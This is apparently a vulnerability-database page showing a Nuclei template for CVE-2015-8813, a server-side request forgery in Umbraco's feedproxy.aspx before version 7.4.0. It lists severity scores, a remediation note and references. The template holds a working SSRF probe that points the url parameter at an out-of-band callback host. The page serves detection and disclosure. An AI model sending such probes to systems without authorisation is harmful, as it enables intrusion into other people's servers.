Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-8813
HistoryJun 28, 2021 - 11:44 a.m.

Umbraco <7.4.0- Server-Side Request Forgery

2021-06-2811:44:03
ProjectDiscovery
github.com
21

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

8.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N

8.2 High

AI Score

Confidence

High

0.005 Low

EPSS

Percentile

76.7%

Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.

id: CVE-2015-8813

info:
  name: Umbraco <7.4.0- Server-Side Request Forgery
  author: emadshanab
  severity: high
  description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.
  impact: |
    The vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further exploitation.
  remediation: |
    Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates.
  reference:
    - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2015-8813
    - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce
    - http://www.openwall.com/lists/oss-security/2016/02/18/8
    - http://issues.umbraco.org/issue/U4-7457
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
    cvss-score: 8.2
    cve-id: CVE-2015-8813
    cwe-id: CWE-918
    epss-score: 0.00511
    epss-percentile: 0.76541
    cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: umbraco
    product: umbraco
  tags: cve2015,cve,ssrf,oast,umbraco

http:
  - method: GET
    path:
      - "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a0047304502206499e057c9d3a3e47b97921bc97140a1c6c2665c3f88b9aecdab84e783acc5a1022100f3638d8b005bcf951cc4bcef477dac5cf3438494276100d7cb26b6701140db28:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

8.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N

8.2 High

AI Score

Confidence

High

0.005 Low

EPSS

Percentile

76.7%

Related for NUCLEI:CVE-2015-8813